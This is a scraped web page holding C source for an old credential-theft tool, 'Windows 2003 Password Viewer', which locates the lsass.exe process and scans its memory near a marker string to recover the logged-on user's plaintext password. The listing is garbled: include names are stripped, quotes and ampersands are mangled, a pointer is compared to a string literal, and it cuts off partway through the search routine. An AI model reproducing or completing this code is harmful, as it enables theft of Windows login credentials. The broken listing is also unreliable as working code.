代码: //******************************************************************************** // Version: V1.0 // Coder: WinEggDrop // Date Release: 12/15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method // Used Is Pretty Unwise,But This May Be The Only Way To Review The // Logon User"s Password On Windows 2003. // Test PlatForm: Windows 2003 // Compiled On: VC++ 6.0 //******************************************************************************** #include #include #include
#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable
char Password[MAX_PATH] = ; // Store The Found Password
// Function ProtoType Declaration //------------------------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID); int Search(char *Buffer,const UINT nSize); DWORD GetLsassPID(); BOOL Is2003(); //------------------------------------------------------------------------------------------------------ // End Of Fucntion ProtoType Declaration
int main() { DWORD PID = 0; printf("Windows 2003 Password Viewer V1.0 By WinEggDrop
");
if (!Is2003()) // Check Out If The Box Is 2003 { printf("The Program Can"t Only Run On Windows 2003 Platform
"); return -1; }
PID = GetLsassPID(); // Get The Lsass.exe PID
if (PID == 0) // Fail To Get PID If Returning Zerom { return -1; }
FindPassword(PID); // Find The Password From Lsass.exe Memory return 0; } // End main()
//------------------------------------------------------------------------------------ // Purpose: Search The Memory amp; Try To Get The Password // Return Type: int // Parameters: // In: char *Buffer --> The Memory Buffer To Search // Out: const UINT nSize --> The Size Of The Memory Buffer // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location,But It"s Not Always True That // We Will Find The Magic String,Or Even We Find It,The Password May Be Located // At Some Other Place.We Only Look For Luck //------------------------------------------------------------------------------------ int Search(char *Buffer,const UINT nSize) { UINT OffSet = 0; UINT i = 0; UINT j = 0 ; UINT Count = 0; if (Buffer == NULL) { return -1; } for (i = 0 ; i < nSize ; i++) { /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate The Magic String,We Have To Do It Manually And Slowly */ if (Buffer == "L") { OffSet = 0; if (strnicmp(amp;Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0) { OffSet += strlen("LocalSystem") + 1; if (strnicmp(amp;Buffer[i + OffSet],"Remote",strlen("Remote")) == 0) { OffSet += strlen("Remote") + 1; if (strnicmp(amp;Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0) { OffSet += strlen("Procedure") + 1; if (strnicmp(amp;Buffer[i + OffSet],"Call",strlen("Call")) == 0) { i += OffSet; break; } } } } } }
京公网安备 11010802021500号